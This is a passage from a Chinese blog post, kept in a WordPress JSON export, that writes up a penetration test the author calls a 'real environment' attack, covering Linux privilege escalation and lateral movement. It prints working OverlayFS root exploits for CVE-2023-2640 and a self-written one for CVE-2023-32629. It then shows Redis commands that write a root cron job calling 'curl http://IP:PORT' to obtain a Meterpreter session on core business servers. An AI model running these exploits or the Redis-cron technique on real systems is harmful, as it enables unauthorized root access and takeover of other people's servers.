https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-suggester-1024x311.jpg 1024w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-suggester-150x46.jpg 150w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-msf-suggester-768x233.jpg 768w\" sizes=\"auto, (max-width: 1256px) 100vw, 1256px\" \/><\/p>\n<p>\u5178\u578b\uff08typical\uff09\uff0c\u5168\u90e8\u8bd5\u4e86\u4e00\u4e0b\uff0c\u679c\u7136\u90fd\u4e0d\u884c\u3002\u9274\u4e8e\u662f ubuntu 20.04 \u548c\u4e00\u4e2a\u7b97\u4e0d\u4e0a\u65e7\u7684\u5185\u6838\u7248\u672c\uff0c\u6682\u4e14\u5bfb\u627e\u5176\u4ed6\u53ef\u63d0\u6743\u7684\u5229\u7528\u70b9\uff1a<\/p>\n<ol>\n<li style=\"list-style-type: none;\">\n<ol>\n<li>\u626b SUID\uff0c\u81ea\u7136\u662f\u5565\u4e5f\u6ca1\u6709\uff0c\u53c8\u4e0d\u662f\u6253 CTF \u5462\uff1b<\/li>\n<li>\u627e\u53ef\u5199\u6587\u4ef6\uff0ccrontab\uff0c\u81ea\u7136\u4e5f\u662f\u5565\u4e5f\u6ca1\u6709\uff1b<\/li>\n<li>\u6709\u4ec0\u4e48\u5947\u6280\u6deb\u5de7\u5c31\u4e0d\u4e00\u4e00\u53bb\u8bd5\u4e86\uff0c\u56e0\u4e3a\u662f\u6bd4\u8f83\u6807\u51c6\u9ed8\u8ba4\u5b89\u88c5\u7684 ubuntu \u65b0\u7248\u672c\uff1b<\/li>\n<li>\u67e5\u770b\u8fd0\u884c\u670d\u52a1\uff0cnginx \/ rsync \/ vsftpd\uff0c\u90fd\u662f\u65b0\u7248\u672c\uff0c\u65e0\u63d0\u6743\u6f0f\u6d1e\uff1b<\/li>\n<li>rsync \u4ee5 root \u8fd0\u884c\uff0c\u660e\u6587\u5bc6\u7801\u4e8e\u5907\u4efd\u6587\u4ef6\u6cc4\u9732\uff0c\u4f46\u662f read only\uff1b<\/li>\n<li>vsftpd \u5bc6\u7801\u4e0d\u77e5\u9053\uff0c\u867d\u7136\u4e0e rsync \u5f00\u653e\u7684\u662f\u540c\u76ee\u5f55\uff0c\u4f46\u6743\u9650\u662f www-data \uff0c\u4e14 nginx \u4e0a\u6ca1\u6709\u4efb\u4f55\u52a8\u6001\u670d\u52a1\uff08\u7ed5\uff01\uff09\uff1b<\/li>\n<li>\u67e5\u770b home \u76ee\u5f55\uff0c\u53d1\u73b0\u4e00\u4e2a\u4ee5\u7528\u6237\u6743\u9650\u8fd0\u884c\u7684 .service \u7a0b\u5e8f\u662f 777\uff0c\u8fd9\u4e0b\u5f00\u5fc3\u574f\u4e86\uff01\u62c9\u56de\u6765 IDA \u4e00\u770b\uff0cgo \u5199\u7684\u3002\u3002\u3002\u540c\u6b65\u6570\u636e\u5e93\u7528\u7684\uff0c\u7a0b\u5e8f\u672c\u8eab\u6ca1\u5565\u95ee\u9898\uff0c\u4e5f\u6ca1\u627e\u5230\u80fd\u8ba9\u5b83\u5d29\u6e83\u91cd\u542f\u7684\u70b9\uff0c\u6240\u4ee5\u8fd9\u91cc\u5c31\u7b97\u8986\u5199\u4e86\u4e5f\u6ca1\u7528\uff1b<\/li>\n<li>\u8fd9\u4e0b\u7a77\u9014\u672b\u8def\u4e86\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>\u7136\u540e\u5076\u7136\u95f4\u770b\u5230\u4e86 Mr. CVE-2023-32629\uff0cPoC \u90fd\u5728\u90a3\u4e86\u6ca1\u6709\u4e0d\u8bd5\u7684\u9053\u7406\u554a\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1798\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-fake-root.jpg\" alt=\"\" width=\"607\" height=\"222\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-fake-root.jpg 607w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-fake-root-300x110.jpg 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-fake-root-150x55.jpg 150w\" sizes=\"auto, (max-width: 607px) 100vw, 607px\" \/><\/p>\n<p>\u7ed3\u679c\u5c34\u5c2c\u4e86\uff0c\u8fd9\u4e2a root \u5565\u6587\u4ef6\u4e5f\u8bfb\u4e0d\u4e86\u3002\u5b83\u5c31\u662f\u4e2a\u5047 root\uff01\uff01\u9ad8\u5174\u5f97\u592a\u65e9\u3002\u4e3a\u4ec0\u4e48\u8fd9\u4e48\u8bf4\u5462\uff0c\u4e4b\u540e\u770b\u4ee3\u7801\u624d\u53d1\u73b0\u5b83\u7684\u529f\u80fd\u7b49\u4ef7\u4e8e <code>unshare -rm sh -c \"id\"<\/code> \uff0c\u7b80\u76f4\u65e0\u8bed\u3002\u4e0d\u8fc7\u76f8\u5bf9\u5730\uff0cCVE-2023-2640 \u7684 PoC \u786e\u5b9e\u662f\u771f\u5b9e\u7684\uff1a<\/p>\n<pre class=\"lang:sh decode:true \">unshare -rm sh -c \"mkdir l u w m &amp;&amp; cp \/u*\/b*\/p*3 l\/;\r\nsetcap cap_setuid+eip l\/python3;\r\nmount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp;\r\ntouch m\/*;\" &amp;&amp;\r\nu\/python3 -c 'import os;os.setuid(0);os.system(\"id\")'; rm -rf l u w m<\/pre>\n<p>\u7b80\u5355\u5206\u6790\u4e00\u4e0b\uff0c\u5176\u5b9e\u5f88\u663e\u7136\uff0c\u5728 namespace \u91cc\u8fdb\u884c setcap\uff0c\u7136\u540e mount overlay \u5e76\u89e6\u53d1 copy_up\uff0c\u53d1\u73b0 capabilities \u6210\u529f\u9003\u9038\u81f3\u539f\u73af\u5883\u3002\u4f46\u662f\u8fd9\u91cc\u7684\u95ee\u9898\u662f\uff0c\u6ca1\u9519\uff0c\u76ee\u6807\u673a\u5668 5.4.0-148\uff0c\u662f\u4e0d\u53d7\u5f71\u54cd\u7684\u7248\u672c\u3002\u7136\u540e\u518d\u770b\u4e00\u773c CVE-2023-32629\uff0c\u5f88\u5e78\u8fd0\u5730\uff0c\u76f4\u5230 5.4.0-155 \u624d\u88ab\u4fee\u590d\uff0c\u4e5f\u5c31\u662f\u8bf4\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u5229\u7528\u53ef\u80fd\u7684\uff01\uff01\u82e6\u4e8e\u7f51\u4e0a\u6ca1\u6709\u73b0\u6210\u7684 PoC\uff0c\u8fc7\u51e0\u5929\u5b83\u5185\u6838\u7248\u672c\u8bf4\u4e0d\u5b9a\u5c31\u6eda\u4e0a\u53bb\u4e86\uff0c\u5fc5\u987b\u8bf4\u5e72\u5c31\u5e72\uff0c\u6839\u636e\u73b0\u6709\u7684\u4fe1\u606f\u5199\u4e00\u4e2a\u51fa\u6765\u3002<\/p>\n<p>\u9996\u5148\u6574\u7406\u4e00\u4e0b OverlayFS \u7684 timeline\uff0c\u53ef\u4ee5\u53d1\u73b0\u4e3b\u7ebf\u90fd\u662f\u56f4\u7ed5 copy_up \u7684\u6743\u9650\u68c0\u6d4b\u9519\u8bef\uff1a<\/p>\n<ol>\n<li style=\"list-style-type: none;\">\n<ol>\n<li><a href=\"https:\/\/ubuntu.com\/security\/CVE-2016-1576\">CVE 2016-1576<\/a> \uff1acopy_up \u5141\u8bb8\u4ece\u81ea\u5b9a\u4e49\u7684 fuse \u4e2d\u62f7\u8d1d\u4efb\u610f UID\/GID \u53ca SUID \u7684\u7a0b\u5e8f\u3002<\/li>\n<li><a href=\"https:\/\/ubuntu.com\/security\/CVE-2021-3493\">CVE-2021-3493<\/a> \uff1acopy_up \u91cc\u7684 vfs_setxattr() \u7f3a\u4e4f\u5bf9 namespace \u7684\u9694\u79bb\uff0c\u5141\u8bb8 capabilities \u7684\u76f4\u63a5\u62f7\u8d1d\u3002<\/li>\n<li><a href=\"https:\/\/ubuntu.com\/security\/CVE-2021-3847\">CVE-2021-3847<\/a> \uff1a\u4e0d\u8be6\u3002<\/li>\n<li><a href=\"https:\/\/ubuntu.com\/security\/CVE-2023-0386\">CVE-2023-0386<\/a> \uff1a\u540c CVE 2016-1576 \uff0c\u800c\u4e14\u662f\u5b8c\u5168\u76f8\u540c\u3002\uff08\u65e7\u6d1e\u65b0\u4fee\uff1f\u4e0d\u662f\u5f88\u80fd\u7406\u89e3\uff09<\/li>\n<li><a href=\"https:\/\/ubuntu.com\/security\/CVE-2023-2640\">CVE-2023-2640<\/a> \uff1aCVE-2021-3493 \u7684\u4e0d\u5b8c\u5168\u4fee\u590d\uff08\u5728 ubuntu \u4e2d\u88ab ovl_copy_xattr() \u91cd\u65b0\u5f15\u5165\uff09\uff0c\u901a\u8fc7 ovl_do_xattr() \u89e6\u53d1\u3002<\/li>\n<li><a href=\"https:\/\/ubuntu.com\/security\/CVE-2023-32629\">CVE-2023-32629<\/a> \uff1a\u540c\u4e0a\uff0c\u4f46\u88ab ovl_copy_up_meta_inode_data() \u65b0\u5f15\u5165\uff0c\u540c\u6837\u901a\u8fc7\u4fee\u590d\u4e0d\u5b8c\u5168\u7684 ovl_do_xattr() \u89e6\u53d1\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>\u800c\u5df2\u6709\u7684\u4fe1\u606f\u662f\uff0c<code>metacopy=on<\/code> \u662f\u89e6\u53d1\u7684\u5165\u53e3\u70b9\u3002\u6839\u636e metacopy \u7684\u7279\u6027\uff0c\u8fdb\u884c\u5982\u4e0b\u7684\u6d4b\u8bd5\uff1a<\/p>\n<pre class=\"lang:sh decode:true \">$ unshare -rm sh -c \"mkdir l u w m;\r\n&gt; cp \/u*\/b*\/p*3 l\/;\r\n&gt; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m;\r\n&gt; ls -alh u\/;\r\n&gt; chmod 777 m\/python3;\r\n&gt; ls -alh u\/\"; rm -rf l u w m\r\ntotal 8.0K\r\ndrwxrwxr-x  2 root   root    4.0K Sep 11 08:50 .\r\ndrwxrwxrwt 19 nobody nogroup 4.0K Sep 11 08:50 ..\r\ntotal 5.3M\r\ndrwxrwxr-x  2 root   root    4.0K Sep 11 08:50 .\r\ndrwxrwxrwt 19 nobody nogroup 4.0K Sep 11 08:50 ..\r\n-rwxrwxrwx  1 root   root    5.3M Sep 11 08:50 python3\r\n\r\n$ unshare -rm sh -c \"mkdir l u w m;\r\n&gt; cp \/u*\/b*\/p*3 l\/;\r\n&gt; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w,metacopy=on m;\r\n&gt; ls -alh u\/;\r\n&gt; chmod 777 m\/python3;\r\n&gt; ls -alh u\/\"; rm -rf l u w m\r\ntotal 8.0K\r\ndrwxrwxr-x  2 root   root    4.0K Sep 11 08:54 .\r\ndrwxrwxrwt 19 nobody nogroup 4.0K Sep 11 08:54 ..\r\ntotal 12K\r\ndrwxrwxr-x  2 root   root    4.0K Sep 11 08:54 .\r\ndrwxrwxrwt 19 nobody nogroup 4.0K Sep 11 08:54 ..\r\n-rwxrwxrwx  1 root   root    5.3M Sep 11 08:54 python3\r\n<\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\uff0c\u5f00\u542f metacopy \u540e\uff0c\u5bf9 mount \u91cc\u7684\u6587\u4ef6\u8fdb\u884c chmod\/chown \u7b49\u64cd\u4f5c\u65f6\uff0c\u4e0d\u4f1a\u8fdb\u884c\u6587\u4ef6\u5185\u5bb9\u7684 copy_up\uff0c\u800c\u53ea\u662f\u521b\u5efa\u4e00\u4e2a\u65b0\u7684 inode \u4fdd\u5b58\u5176\u5c5e\u6027\u3002\u4e0a\u9762\u7684 total 5.3M \u8ddf\u5e95\u4e0b\u7684 total 12K \u8bc1\u660e\u4e86\u8fd9\u4e00\u70b9\u3002\u4e5f\u5c31\u662f\u8bf4\uff0c\u8fdb\u884c setcap \u65f6\u4e5f\u4f1a\u6709\u7c7b\u4f3c\u7684\u884c\u4e3a\uff0c\u7531\u4e8e\u6f0f\u6d1e\u51fd\u6570\u7684\u5b58\u5728\uff0c\u6700\u7ec8\u9020\u6210\u4e86 capabilities \u7684\u4efb\u610f\u62f7\u8d1d\uff01<\/p>\n<p>\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u7684\u4e00\u70b9\u662f\uff0c\u5728 setcap \u5b8c\u540e\u9700\u8981 touch \u4e00\u4e0b\u89e6\u53d1\u5b9e\u9645\u6587\u4ef6\u5185\u5bb9\u7684 copy_up\uff0c\u5426\u5219\u662f\u6267\u884c\u4e0d\u4e86\u7684\uff1a<code>-bash: .\/u\/python3: cannot execute binary file: Exec format error<\/code>\u3002\u8fd9\u91cc\u7684 copy_up \u5e76\u4e0d\u4f1a\u8986\u76d6 upper \u91cc\u5df2\u7ecf\u8bbe\u597d\u7684 capabilities\u3002\u4e8e\u662f\uff1a<\/p>\n<pre class=\"lang:sh decode:true \">unshare -rm sh -c \"mkdir l u w m;\r\ncp \/u*\/b*\/p*3 l\/;\r\nmount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w,metacopy=on m;\r\nsetcap cap_setuid+eip m\/python3;\r\ntouch m\/python3\"; .\/u\/python3 -c 'import os;os.setuid(0);os.system(\"id\")'; rm -rf l u w m<\/pre>\n<p>\u5373\u4e3a CVE-2023-32629 \u7684 PoC\u3002\u8fd9\u4e0b\u53ef\u662f\u5b9e\u6253\u5b9e\u7684 root \u6743\u9650\uff0c\u591f\u786c\uff01<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1800\" src=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-real-root.png\" alt=\"\" width=\"616\" height=\"353\" srcset=\"https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-real-root.png 616w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-real-root-300x172.png 300w, https:\/\/0.mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-real-root-150x86.png 150w\" sizes=\"auto, (max-width: 616px) 100vw, 616px\" \/><\/p>\n<p><a id=\"tag_4_end\"><\/a>\u00a0<\/p>\n<ul>\n<li>\n<h5>\u5386\u7ecf\u8270\u96be\u7ec8\u6210\u5927\u4e1a<\/h5>\n<\/li>\n<\/ul>\n<p>\u6709\u4e86 root \u6743\u9650\uff0c\u5c31\u6709\u4e86 .ssh \u91cc\u7684 id_rsa\uff0c\u4e5f\u5c31\u6709\u4e86\u5176\u4ed6\u673a\u5b50\u7684\u63a7\u5236\u6743\u3002\u867d\u7136\u4ece .bash_history \u91cc\u80fd\u770b\u5230\u5f88\u591a IP\uff0c\u4f46\u5b9e\u6d4b\u53ea\u6709\u4fe9\u80fd\u7528\u5f53\u524d\u7684\u5bc6\u94a5\u8fde\u4e0a\u3002\u524d\u9762\u7684 Vert.x \u5c31\u8dd1\u5728\u5176\u4e2d\u4e00\u53f0\u7684 docker \u91cc\u3002\u56de\u60f3\u8d77 MS17-010 \u521a\u51fa\u6765\u90a3\u4f1a\uff0c\u8981\u8fdb\u673a\u623f\u91cc\u7684\u54ea\u53f0 XP \u5b8c\u5168\u770b\u7684\u662f\u5fc3\u60c5\u3002\u73b0\u5728\u4e5f\u6709\u70b9\u513f\u7c7b\u4f3c\u7684\u611f\u53d7\u3002\u867d\u7136\u53ea\u6709\u4e24\u53f0\u3002<\/p>\n<p>\u8fd9\u4e24\u53f0\u5df2\u7ecf\u662f\u4e1a\u52a1\u6838\u5fc3\u673a\u4e86\uff0c\u91cc\u9762\u6709\u4e3b\u7a0b\u5e8f\u7684\u914d\u7f6e\u6587\u4ef6\u3002\u5176\u5b9e\u5728\u4e4b\u524d\u7684\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u66fe\u7ecf\u53d1\u73b0\u8fc7\u53e6\u4e00\u53f0\u5f00 MySQL \u7684\u673a\u5b50\uff0c\u4f46 <code>secure_file_priv<\/code> \u4e3a\u9ed8\u8ba4\u503c\uff0c\u65e0\u6cd5\u5229\u7528\u3002\u7136\u540e\u5728\u914d\u7f6e\u6587\u4ef6\u91cc\u53d1\u73b0\u4e86\u5bf9\u5176 Redis \u7684\u8fde\u63a5\u3002\u5185\u7f51\uff0c\u6240\u4ee5\u4e0d\u7528\u5bc6\u7801\u3002\u4ece <code>INFO<\/code> \u5f97\u5230\u7248\u672c\u4fe1\u606f\uff1a<code>redis_version:3.2.9<\/code> \u53ca\u00a0<code>os:Linux 3.10.0-1127.10.1.el7.x86_64<\/code> \u3002\u8fd9\u53ef\u591f\u65e7\u7684\u3002CentOS \u7684\u8001\u53e4\u8463\u90fd\u662f\u8fd9\u6837\u7684\u3002<\/p>\n<p>\u60f3\u7740\u5c3d\u91cf\u4e0d\u8986\u76d6\u6587\u4ef6\uff0c\u7136\u540e\u53d1\u73b0\u901a\u8fc7\u4e3b\u4ece\u590d\u5236 + module load \u6765 getshell \u7684\u65b9\u6cd5\u53ea\u9002\u7528 4.x ~ 5.x\uff0c\u592a\u65e7\u5566\uff01\uff01\u8986\u76d6 root \u7684 ssh key \u80af\u5b9a\u662f\u4e07\u4e0d\u5f97\u5df2\u7684\u65f6\u5019\u8003\u8651\u7684\u3002\u90a3\u4e48\u53ef\u80fd\u6027\u6240\u6307\u5f15\u51fa\u7684\u9053\u8def\u5c31\u53ea\u6709\u4e00\u6761\uff1a\u8986\u76d6 <code>\/var\/spool\/cron\/root<\/code> \uff0c\u7136\u540e\u7948\u7977\u5b83\u539f\u6765\u662f\u6ca1\u6709\u5185\u5bb9\u7684\u3002<\/p>\n<p>\u8fd9\u91cc\u7684\u65b9\u6cd5\u662f\u901a\u7528\u7684\u3002\u9996\u5148\u83b7\u53d6\u539f\u914d\u7f6e\u6587\u4ef6\uff0c\u6839\u636e\u9700\u6c42 <code>select<\/code> \u4e00\u4e2a <code>db<\/code>\uff0c\u8fd9\u91cc <code>dbsize<\/code> \u662f <code>0<\/code> \u6240\u4ee5\u5c31\u4e0d\u7528\u4e86\uff0c\u5199\u5165 k-v \u5bf9\u540e\u66f4\u6539 <code>dir<\/code> \u53ca <code>dbfilename<\/code>\uff0c\u6700\u540e\u4e00\u4e2a <code>save<\/code>\u3002\u6709\u4e00\u70b9\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5728\u6709\u4e9b\u573a\u666f\u4e0b\u53ef\u80fd\u9700\u8981\u5148\u5173\u95ed <code>rdbcompression<\/code>\u3002\u53ef\u4ee5\u6839\u636e\u9700\u8981\u5728\u5229\u7528\u540e\u8fd8\u539f\u914d\u7f6e\u3002<\/p>\n<pre class=\"lang:default decode:true \">select 11\r\nflushdb\r\n\r\nset 1 \"\\n\\n*\/1 * * * * curl http:\/\/IP:PORT\\n\\n\"\r\nconfig set dir \/var\/spool\/cron\r\nconfig set dbfilename root\r\nconfig set rdbcompression no\r\nsave\r\n\r\nconfig set dir \/var\/lib\/redis\r\nconfig set dbfilename dump.rdb\r\nconfig set rdbcompression yes<\/pre>\n<p>\u5f88\u5e78\u8fd0\uff0c\u8fd9\u91cc redis \u662f\u4ee5 root \u6743\u9650\u8dd1\u7684\u3002\u968f\u7740\u4e00\u58f0\u6e05\u8106\u7684 <code>[*] Meterpreter session opened<\/code> \u843d\u4e0b\uff0c\u81f3\u6b64\uff0c\u4e24\u53f0\u6838\u5fc3\u4e1a\u52a1\u673a + \u4e24\u53f0\u6570\u636e\u5e93\u5747\u88ab\u6536\u5165\u9ebe\u4e0b\u3002<\/p>\n<p>\u4ece\u4e00\u4e2a\u5947\u602a\u7684 PostgreSQL \u6ce8\u5165\u5f00\u59cb\u7684\u65c5\u7a0b\uff0c\u4e5f\u5373\u5c06\u8fce\u6765\u5c3e\u58f0\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &#038;nbs &hellip; <a href=\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\" class=\"more-link\">\u7ee7\u7eed\u9605\u8bfb<span class=\"screen-reader-text\">\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[111],"tags":[],"class_list":["post-1757","post","type-post","status-publish","format-standard","hentry","category-web"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5 - mnihyc&#039;s Blog<\/title>\n<meta name=\"description\" content=\"\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &nbsp; \u76ee\u5f55 PostgreSQL \u6ce8\u5165 \u521d\u51fa\u8305\u5e90 \u6e10\u5165\u4f73\u5883 \u67f3\u6697\u82b1\u660e Vert.x \u5ba1\u8ba1 \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20 \u4e8c\u91cd\u594f\u7684 RCE \u5e55\u95f4 IP \u98ce\u6ce2 Msf \u98ce\u6ce2 \u6a2a\u5411\u79fb\u52a8 \u6f2b\u6f2b\u63d0\u6743\u8def\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5 - mnihyc&#039;s Blog\" \/>\n<meta property=\"og:description\" content=\"\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &nbsp; \u76ee\u5f55 PostgreSQL \u6ce8\u5165 \u521d\u51fa\u8305\u5e90 \u6e10\u5165\u4f73\u5883 \u67f3\u6697\u82b1\u660e Vert.x \u5ba1\u8ba1 \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20 \u4e8c\u91cd\u594f\u7684 RCE \u5e55\u95f4 IP \u98ce\u6ce2 Msf \u98ce\u6ce2 \u6a2a\u5411\u79fb\u52a8 \u6f2b\u6f2b\u63d0\u6743\u8def\" \/>\n<meta property=\"og:url\" content=\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\" \/>\n<meta property=\"og:site_name\" content=\"mnihyc&#039;s Blog\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-01T16:16:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-09-23T10:52:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png\" \/>\n<meta name=\"author\" content=\"mnihyc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@mnihyc\" \/>\n<meta name=\"twitter:site\" content=\"@mnihyc\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"mnihyc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#article\",\"isPartOf\":{\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\"},\"author\":{\"name\":\"mnihyc\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"headline\":\"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5\",\"datePublished\":\"2023-09-01T16:16:38+00:00\",\"dateModified\":\"2023-09-23T10:52:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\"},\"wordCount\":516,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"image\":{\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage\"},\"thumbnailUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png\",\"articleSection\":[\"Web\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\",\"url\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\",\"name\":\"\u4e00\u4e2a\u771f\u5b9e\u73af\u5883\u7684XX\u7cfb\u7edf\u6e17\u900f\u6d4b\u8bd5 - mnihyc&#039;s Blog\",\"isPartOf\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage\"},\"image\":{\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage\"},\"thumbnailUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png\",\"datePublished\":\"2023-09-01T16:16:38+00:00\",\"dateModified\":\"2023-09-23T10:52:24+00:00\",\"description\":\"\u514d\u8d23\u58f0\u660e\uff1a\u672c\u6d4b\u8bd5\u7684\u6240\u6709\u5185\u5bb9\u5747\u5728\u53ef\u63a7\u7684\u73af\u5883\u5185\u8fdb\u884c\uff0c\u672c\u6587\u7ae0\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u8bf7\u4e8e\u67e5\u9605\u540e\u56db\u5341\u516b\u5c0f\u65f6\u5185\u4e3b\u52a8\u5fd8\u8bb0\u3002 &nbsp; \u76ee\u5f55 PostgreSQL \u6ce8\u5165 \u521d\u51fa\u8305\u5e90 \u6e10\u5165\u4f73\u5883 \u67f3\u6697\u82b1\u660e Vert.x \u5ba1\u8ba1 \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0b\u8f7d \u6709\u9650\u5236\u7684\u4efb\u610f\u4e0a\u4f20 \u4e8c\u91cd\u594f\u7684 RCE \u5e55\u95f4 IP \u98ce\u6ce2 Msf \u98ce\u6ce2 \u6a2a\u5411\u79fb\u52a8 \u6f2b\u6f2b\u63d0\u6743\u8def\",\"breadcrumb\":{\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/0.mnihyc.com\/blog\/archives\/1757\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#primaryimage\",\"url\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png\",\"contentUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2023\/09\/p1757-404-search-result.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/0.mnihyc.com\/blog\/archives\/1757#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\"